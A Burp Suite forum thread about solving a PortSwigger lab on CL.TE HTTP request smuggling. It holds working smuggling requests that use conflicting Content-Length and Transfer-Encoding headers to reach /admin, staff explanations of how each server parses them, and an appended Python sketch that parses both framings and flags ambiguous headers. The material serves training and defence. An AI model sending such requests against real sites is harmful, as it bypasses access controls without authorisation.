Burp Suite User Forum

HTTP request Smuggling CL.TE LAB

Giacomo | Last updated: Jan 14, 2023 03:05PM UTC

Hi, I'm trying to solve the lab "Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability". I tried using the following request:

----
POST / HTTP/1.1
Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Connection: closed
Content-Length: 64
Transfer-Encoding: chunked

0
3c
GET /admin HTTP/1.1
Host: localhost
Connection: closed
----

Unfortunately I receive the error "Protocol error". Could you please help me understand why? I checked the lab solution, but honestly the first HTTP request shown there is not clear to me. The chunk length of the second chunk (the smuggled one) is not present. Thanks in advance for the support.

Pablo | Last updated: Jan 15, 2023 07:39PM UTC

GET /admin HTTP/1.1

Giacomo | Last updated: Jan 16, 2023 08:16AM UTC

Sorry, but I didn't get it. I have the same line in the request I posted, but it is not working.

Michelle, PortSwigger Agent | Last updated: Jan 16, 2023 11:22AM UTC

Have you tried comparing the request you are sending with those suggested in the lab solution or the community videos, and also checking for smaller details such as where you are adding new lines?

Giacomo | Last updated: Jan 16, 2023 06:21PM UTC

I'm trying to compare the two requests (mine and the one shown in the lab solution). What I do not understand is the syntax of the request shown in the lab solution:

----
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
X-Ignore: X
----

Before "GET /admin HTTP/1.1" the chunk length in bytes is not present, which, if I understood correctly, should be required by the chunk syntax. Could you kindly help me understand, please?

Ben, PortSwigger Agent | Last updated: Jan 18, 2023 10:44AM UTC

Hi,

Have you read the learning material for request smuggling (the basics are detailed on the page below)?

https://portswigger.net/web-security/request-smuggling

On a general note, in CL.TE labs, the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.

In the request that you have highlighted, the front-end server processes the Content-Length header and determines that the body is 54 bytes long, up to the end of 'X-Ignore: X'. This request is then forwarded on to the back-end server.

The back-end server processes the Transfer-Encoding header, and so treats the message body as using chunked encoding. It processes the first chunk, which is stated to be zero length, and so is treated as terminating the request. The entirety of the 'GET /admin HTTP/1.1.....' request is left unprocessed, and the back-end server will treat this as being the start of the next request in the sequence.
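
The framing described in the reply above, as an added example that is not part of the thread or of PortSwigger's material: a Python sketch that splits the lab-solution body once by Content-Length and once by chunked encoding, plus the check a front-end can apply to refuse such a message. The function names are hypothetical, the body bytes are constructed from the request quoted in the thread, and the chunk parser assumes no trailers.

```python
CRLF = b"\r\n"

# Constructed sample: the body of the lab-solution request quoted in the thread.
BODY = CRLF.join([b"0", b"", b"GET /admin HTTP/1.1",
                  b"Host: localhost", b"X-Ignore: X"])
HEADERS = {"content-length": str(len(BODY)), "transfer-encoding": "chunked"}


def split_by_content_length(headers, stream):
    """Front-end view: the body is exactly Content-Length bytes."""
    n = int(headers["content-length"])
    return stream[:n], stream[n:]


def split_by_chunked(stream):
    """Back-end view: read chunks until the zero-length chunk ends the body."""
    body, pos = b"", 0
    while True:
        eol = stream.index(CRLF, pos)
        size = int(stream[pos:eol].split(b";")[0], 16)  # hex size, ignore extensions
        pos = eol + 2
        if size == 0:
            # Assumption: no trailers, so an empty line closes the message.
            if stream[pos:pos + 2] != CRLF:
                raise ValueError("terminating chunk not followed by empty line")
            return body, stream[pos + 2:]
        if stream[pos + size:pos + size + 2] != CRLF:
            raise ValueError("chunk data not terminated by CRLF")
        body += stream[pos:pos + size]
        pos += size + 2


def is_ambiguous(headers):
    """Both framing headers present: RFC 7230 section 3.3.3 says such a
    message ought to be handled as an error."""
    return "content-length" in headers and "transfer-encoding" in headers


if __name__ == "__main__":
    fe_body, fe_rest = split_by_content_length(HEADERS, BODY)
    be_body, be_rest = split_by_chunked(BODY)
    print("Content-Length:", HEADERS["content-length"])
    print("front-end body bytes:", len(fe_body), "left over:", fe_rest)
    print("back-end body bytes:", len(be_body), "left over:", be_rest)
    print("reject at front-end:", is_ambiguous(HEADERS))
```

The back-end's leftover bytes begin at `GET /admin`, with no chunk size in front of them, because chunk parsing has already stopped at the zero-length chunk.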
